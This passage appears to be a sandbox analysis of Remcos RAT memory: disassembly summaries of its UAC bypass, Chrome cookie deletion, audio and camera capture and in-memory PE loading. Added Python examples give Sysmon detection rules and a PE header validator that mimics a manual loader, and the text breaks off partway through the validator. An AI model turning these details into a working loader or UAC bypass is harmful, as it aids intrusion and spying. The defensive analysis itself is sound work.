                                                                                                • Opcode ID: 0339c64391aa7b84ad00c5218d2df4bd7b811f63d523d6f1ca175f0693cb59ff
                                                                                                • Instruction ID: 7718d61ab729039ae94473664947c91a52367f601ff6055b29c84dcba8ed2574
                                                                                                • Opcode Fuzzy Hash: 0339c64391aa7b84ad00c5218d2df4bd7b811f63d523d6f1ca175f0693cb59ff
                                                                                                • Instruction Fuzzy Hash: E7215230A40219A6CB14F7F1CC969EE7729AF50744F80017FE502B71D1EB7D6945C6DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401A7D
                                                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AC8,Function_00001B8F,00000000,00000000,00000024), ref: 00401B13
                                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401B67
                                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401B76
                                                                                                • waveInStart.WINMM ref: 00401B82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                • String ID: tMG
                                                                                                • API String ID: 1356121797-30866661
                                                                                                • Opcode ID: 9b1047c9ca44e2a749ab23d5d752e689566d8b18fd1d1c15b9f7858ca427b8e5
                                                                                                • Instruction ID: cbef553d477d36f78321a165484ecc4410fcecc505b8f9aca62d01b994c6c3e6
                                                                                                • Opcode Fuzzy Hash: 9b1047c9ca44e2a749ab23d5d752e689566d8b18fd1d1c15b9f7858ca427b8e5
                                                                                                • Instruction Fuzzy Hash: 8E2148716042019FC7299F6AEE09A697BAAFB84711B04403EE10DD76F1DBF848C5CB2C
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                Strings
                                                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                • API String ID: 3121278467-91888290
                                                                                                • Opcode ID: 9f9593b8f3cbf1af3f082b7aabeb6c93854d6e0b44bdec1d55487649986c7e5d
                                                                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                • Opcode Fuzzy Hash: 9f9593b8f3cbf1af3f082b7aabeb6c93854d6e0b44bdec1d55487649986c7e5d
                                                                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                APIs
                                                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                • _free.LIBCMT ref: 00450FC8
                                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                • _free.LIBCMT ref: 00450FD3
                                                                                                • _free.LIBCMT ref: 00450FDE
                                                                                                • _free.LIBCMT ref: 00451032
                                                                                                • _free.LIBCMT ref: 0045103D
                                                                                                • _free.LIBCMT ref: 00451048
                                                                                                • _free.LIBCMT ref: 00451053
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                • int.LIBCPMT ref: 004111BE
                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                • String ID: 8mG
                                                                                                • API String ID: 2536120697-3990007011
                                                                                                • Opcode ID: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                                                                                • Instruction ID: 3a14b803bc510f5ed1108d30ac07207671fc4f07faef22c9ffd8c11cb1ae2def
                                                                                                • Opcode Fuzzy Hash: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                                                                                • Instruction Fuzzy Hash: D3112332900124A7CB14EBAAD8018DEBBA99F44364F11456FFE04B72E1DB789E41CBD8
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040760B
                                                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                • API String ID: 3851391207-3324213274
                                                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                Strings
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                • UserProfile, xrefs: 0040BAE8
                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                • API String ID: 2018770650-304995407
                                                                                                • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
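Three of the functions listed above are directly observable from endpoint telemetry: the geolocation fetch of http://geoplugin.net/json.gp (InternetOpen/InternetReadFile entry), the CMSTPLUA elevation (CoInitializeEx, CoGetObject and the "[+] ucmCMLuaUtilShellExecMethod" debug strings, with the AddInProcess32.exe path handed to ShellExec) and the DeleteFileA call on the Chrome Cookies database. The following is an added example, not code from the sandbox report or from Remcos: a small triage pass over Sysmon-style events that flags each behaviour. The event records are constructed by hand to resemble Sysmon fields; the GUIDs and user paths are invented. Assumed facts, not taken from the report: Sysmon Event ID 1 is process creation, 22 is a DNS query, 23 and 26 are file deletions, and the CMSTPLUA COM server is hosted by dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}. The geoplugin rule is low fidelity on its own, because browsers and legitimate software query the same service; it is useful only as corroboration for the other two.

```python
"""Triage Sysmon-style events for three Remcos behaviours seen in this report.

Added example, not code from the sandbox report or from Remcos. Event records
below are constructed, not real telemetry. Assumed (not from the report):
Sysmon 1 = process create, 22 = DNS query, 23/26 = file delete; CMSTPLUA runs
inside dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}.
"""
import re
from typing import Dict, Iterable, List

CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
GEO_HOST = "geoplugin.net"  # legitimate service: corroboration only

# Path from the report's DeleteFileA string; any profile directory, any case.
CHROME_COOKIES_RE = re.compile(
    r"\\AppData\\Local\\Google\\Chrome\\User Data\\[^\\]+\\Cookies$",
    re.IGNORECASE,
)


def detect_cmstplua_elevation(ev: Dict[str, str]) -> bool:
    """Event 1 whose parent is the CMSTPLUA surrogate (dllhost.exe + CLSID).

    When ShellExec on the elevated CMLuaUtil object succeeds, the new process
    is created by the surrogate, not by the RAT that requested it.
    """
    if ev.get("EventID") != "1":
        return False
    parent_img = ev.get("ParentImage", "").lower()
    parent_cmd = ev.get("ParentCommandLine", "").upper()
    return parent_img.endswith("\\dllhost.exe") and CMSTPLUA_CLSID in parent_cmd


def detect_chrome_cookie_wipe(ev: Dict[str, str]) -> bool:
    """Event 23/26: Chrome's Cookies database deleted by something other than Chrome."""
    if ev.get("EventID") not in ("23", "26"):
        return False
    image = ev.get("Image", "").lower()
    target = ev.get("TargetFilename", "")
    return bool(CHROME_COOKIES_RE.search(target)) and not image.endswith("\\chrome.exe")


def detect_geoplugin_lookup(ev: Dict[str, str]) -> bool:
    """Event 22: DNS query for geoplugin.net (Remcos fetches /json.gp for geolocation)."""
    if ev.get("EventID") != "22":
        return False
    qname = ev.get("QueryName", "").lower().rstrip(".")
    return qname == GEO_HOST or qname.endswith("." + GEO_HOST)


RULES = {
    "cmstplua_uac_bypass": detect_cmstplua_elevation,
    "chrome_cookies_deleted": detect_chrome_cookie_wipe,
    "geoplugin_lookup": detect_geoplugin_lookup,
}


def triage(events: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Return {rule_name: [ProcessGuid, ...]} for every event each rule matched."""
    hits: Dict[str, List[str]] = {name: [] for name in RULES}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(ev.get("ProcessGuid", "?"))
    return hits


# Constructed sample telemetry (invented GUIDs and user paths). AddInProcess32.exe
# is the host the report shows the RAT running in.
SAMPLE_EVENTS = [
    {"EventID": "1", "ProcessGuid": "P-1",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "ParentImage": r"C:\Windows\System32\dllhost.exe",
     "ParentCommandLine": r"C:\Windows\System32\dllhost.exe /Processid:{3e5fc7f9-9a51-4367-9063-a120244fbec7}"},
    {"EventID": "1", "ProcessGuid": "P-2",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
    {"EventID": "26", "ProcessGuid": "P-3",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"EventID": "26", "ProcessGuid": "P-4",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"EventID": "22", "ProcessGuid": "P-5",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "QueryName": "geoplugin.net"},
]

if __name__ == "__main__":
    for rule, guids in triage(SAMPLE_EVENTS).items():
        print(f"{rule:24s} {guids}")
```

The Chrome rule excludes chrome.exe itself because the browser rewrites its own cookie store during normal operation; the CMSTPLUA rule keys on the parent rather than the child because the elevated payload can be any executable, and the report shows the RAT passing its own host path to ShellExec.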
                                                                                                APIs
                                                                                                • AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$AllocOutputShowWindow
                                                                                                • String ID: Remcos v$5.2.0 Pro$CONOUT$
                                                                                                • API String ID: 2425139147-793934204
                                                                                                • Opcode ID: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                • Instruction ID: a031bdd2f27af694b11ce09d1e3c688e218bb3586dee27dfc95755d0e541b829
                                                                                                • Opcode Fuzzy Hash: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                • Instruction Fuzzy Hash: 2D014471A80304BBD610F7F19D8BF9EB7AC9B18B05F500527BA04A70D2EB6DD944466E
                                                                                                Strings
                                                                                                • RG, xrefs: 004076DF
                                                                                                • 0SG, xrefs: 00407715
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$RG
                                                                                                • API String ID: 0-2653435807
                                                                                                • Opcode ID: b018cd633a599e0a64cff488a6689e85db8eb881d1095507843e93d878d2a38f
                                                                                                • Instruction ID: 8e81a4762a03630119b5543cf4782e43f3d691fcab72f30749e56a9243805afb
                                                                                                • Opcode Fuzzy Hash: b018cd633a599e0a64cff488a6689e85db8eb881d1095507843e93d878d2a38f
                                                                                                • Instruction Fuzzy Hash: 08F0F6B0A14141ABCB1067355D286AA3756A784397F00487BF547FB2F2EBBD5C82861E
                                                                                                APIs
                                                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1992179935-0
                                                                                                • Opcode ID: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                • Opcode Fuzzy Hash: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prologSleep
                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$XNG
                                                                                                • API String ID: 3469354165-985523790
                                                                                                • Opcode ID: 298a9f79e8f6c5b4aa2fe0a80a9800f543c0822915ef74d36e6591dd0581f9b7
                                                                                                • Instruction ID: 7593a199e81997f2aad1dc538160579efde4e563a54277089fa649d8e7e3dbe8
                                                                                                • Opcode Fuzzy Hash: 298a9f79e8f6c5b4aa2fe0a80a9800f543c0822915ef74d36e6591dd0581f9b7
                                                                                                • Instruction Fuzzy Hash: 2A51E0B1A042106BCA14FB369D0A66E3655ABC4748F00443FFA09676E2DF7D8E46839E
                                                                                                APIs
                                                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 3950776272-0
                                                                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
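The SetLastError values in the function above are the documented Win32 codes 0xD (ERROR_INVALID_DATA), 0xC1 (ERROR_BAD_EXE_FORMAT), 0xE (ERROR_OUTOFMEMORY) and 0x45A (ERROR_DLL_INIT_FAILED); together with GetNativeSystemInfo (page size) and VirtualAlloc(..., MEM_COMMIT|MEM_RESERVE 0x3000, PAGE_EXECUTE_READWRITE 0x40) this is the order of operations of a loader that maps a PE image from a memory buffer rather than from disk, which matches the "Injects a PE file into a foreign processes" signature. The following is an added example, not code from the report or from Remcos: it performs the header validation such a loader does before allocating, on a PE32 header constructed inline, and returns the same error codes the report shows, so an analyst can see which malformed inputs a manual mapper rejects and which it accepts. It assumes a 4 KiB page size and a 32-bit host; the image-relocation and import-resolution steps that follow in a real loader are out of scope here.

```python
"""Header checks a manual PE32 mapper performs before VirtualAlloc.

Added example, not code from the sandbox report or from Remcos. Constants are
the documented values from winnt.h / winerror.h; the PE32 image built by
build_minimal_pe32() is constructed for demonstration and contains no code.
Assumes a 4 KiB page size (what GetNativeSystemInfo reports on x86/x64).
"""
import struct
from dataclasses import dataclass

ERROR_INVALID_DATA = 0xD
ERROR_BAD_EXE_FORMAT = 0xC1
IMAGE_DOS_SIGNATURE = 0x5A4D          # 'MZ'
IMAGE_NT_SIGNATURE = 0x00004550       # 'PE\0\0'
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PAGE_SIZE = 0x1000                    # assumed; a loader reads this from GetNativeSystemInfo


class BadImage(Exception):
    def __init__(self, win32_error: int, why: str):
        super().__init__(f"0x{win32_error:X}: {why}")
        self.win32_error = win32_error


@dataclass
class ImageInfo:
    machine: int
    size_of_image: int
    alloc_size: int          # SizeOfImage rounded up to page granularity
    entry_point_rva: int
    section_count: int


def align_up(value: int, alignment: int) -> int:
    return (value + alignment - 1) & ~(alignment - 1)


def validate_pe(buf: bytes, host_machine: int = IMAGE_FILE_MACHINE_I386) -> ImageInfo:
    """Raise BadImage with the Win32 code a loader would set; return what it needs to allocate."""
    if len(buf) < 64:
        raise BadImage(ERROR_INVALID_DATA, "too small for IMAGE_DOS_HEADER")
    (e_magic,) = struct.unpack_from("<H", buf, 0)
    if e_magic != IMAGE_DOS_SIGNATURE:
        raise BadImage(ERROR_BAD_EXE_FORMAT, "missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", buf, 0x3C)
    if e_lfanew + 24 > len(buf):                     # Signature + IMAGE_FILE_HEADER
        raise BadImage(ERROR_INVALID_DATA, "e_lfanew points outside the buffer")
    (sig,) = struct.unpack_from("<I", buf, e_lfanew)
    if sig != IMAGE_NT_SIGNATURE:
        raise BadImage(ERROR_BAD_EXE_FORMAT, "missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    if machine != host_machine:
        raise BadImage(ERROR_BAD_EXE_FORMAT, f"machine 0x{machine:X} does not match the host")
    opt = e_lfanew + 24
    if opt + opt_size > len(buf):
        raise BadImage(ERROR_INVALID_DATA, "optional header truncated")
    (magic,) = struct.unpack_from("<H", buf, opt)
    if magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        raise BadImage(ERROR_BAD_EXE_FORMAT, "not a PE32 optional header")
    (entry_rva,) = struct.unpack_from("<I", buf, opt + 16)         # AddressOfEntryPoint
    (section_alignment,) = struct.unpack_from("<I", buf, opt + 32)  # SectionAlignment
    (size_of_image,) = struct.unpack_from("<I", buf, opt + 56)      # SizeOfImage
    if section_alignment == 0 or section_alignment & (section_alignment - 1):
        raise BadImage(ERROR_BAD_EXE_FORMAT, "SectionAlignment is not a power of two")
    # A loader rounds SizeOfImage up to the host page size before VirtualAlloc.
    return ImageInfo(machine, size_of_image, align_up(size_of_image, PAGE_SIZE), entry_rva, nsections)


def loader_status(buf: bytes, host_machine: int = IMAGE_FILE_MACHINE_I386) -> int:
    """0 when the header passes, otherwise the Win32 error the loader would SetLastError."""
    try:
        validate_pe(buf, host_machine)
        return 0
    except BadImage as exc:
        return exc.win32_error


def build_minimal_pe32(machine: int = IMAGE_FILE_MACHINE_I386, size_of_image: int = 0x3010) -> bytes:
    """Constructed header-only PE32 (DOS header, PE signature, file header, optional header)."""
    dos = bytearray(64)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 64)                          # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)                       # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                     # ImageBase (as in the dump)
    struct.pack_into("<I", opt, 32, 0x1000)                       # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                        # FileAlignment
    struct.pack_into("<I", opt, 56, size_of_image)                # SizeOfImage
    struct.pack_into("<I", opt, 60, 0x200)                        # SizeOfHeaders
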